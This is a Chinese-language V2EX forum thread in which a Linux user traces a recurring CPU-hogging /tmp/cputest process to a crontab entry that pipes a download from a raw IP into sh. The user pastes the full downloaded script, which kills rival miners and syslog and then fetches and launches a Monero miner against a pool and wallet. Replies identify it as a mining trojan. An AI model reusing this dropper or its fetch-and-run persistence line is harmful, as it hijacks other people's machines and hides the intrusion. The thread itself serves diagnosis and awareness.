求助: 一直有个/tmp/cputest 的进程占满了 CPU, 每次删掉之后它又自动出现, 如何判断这个文件是怎么来的?

2017-04-06 10:20:03 +08:00
 Symo

5867 次点击
所在节点    Linux
8 条回复
Symo
2017-04-06 10:25:47 +08:00
问题找到了, crontab 里面有这么一行
`curl http://194.87.239.7/common/logo.jpg|sh`
文件下载下来是这样的
```
#!/bin/sh
rm -rf /tmp/index_bak.*
rm -rf /tmp/httpd.conf.*
rm -rf /tmp/httpd.conf
pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4
pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB
pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df
pkill -f cpuloadtest
pkill -f crypto-pool
pkill -f xmr
pkill -f prohash
pkill -f monero
pkill -f miner
pkill -f nanopool
pkill -f minergate
pkill rsyslog
pkill syslog
pkill -f "/tmp/apache"
pkill -f "/tmp/httpd.conf"
ps auxf|grep -v grep|grep "/tmp/apache"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/tmp/httpd.conf"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9
ps -fe|grep 43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R |grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /tmp/cputest http://194.87.239.7/common/cputest.jpg
wget -O /tmp/cputest http://194.87.239.7/common/cputest.jpg
else
curl -o /tmp/cputest http://194.87.239.7/common/cputest_na.jpg
wget -O /tmp/cputest http://194.87.239.7/common/cputest_na.jpg
fi
chmod +x /tmp/cputest
nohup /tmp/cputest -B -a cryptonight -o stratum+tcp://212.129.44.156:80 -u 43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R -p x >/dev/null
else
echo "runing....."
fi
```

这个脚本是有什么用意么?
ryd994
2017-04-06 10:30:09 +08:00
哈哈哈哈真黑,先把别人的挖矿软件干掉
再开自己的
xss
2017-04-06 10:31:18 +08:00
挖矿木马....
holyzhou
2017-04-06 10:51:00 +08:00
我能说 这脚本写的真是丑嘛。
mingl0280
2017-04-06 12:27:45 +08:00
挖矿马 233333
expy
2017-04-06 12:44:26 +08:00
同行是大敌,名字叫 cputest 也是机智 233
AlisaDestiny
2017-04-06 13:13:43 +08:00
真是长见识了。好奇的是这个 cron task 是如何写进去的。
kmahyyg
2017-04-06 13:16:25 +08:00
3f 正解

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/352853

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX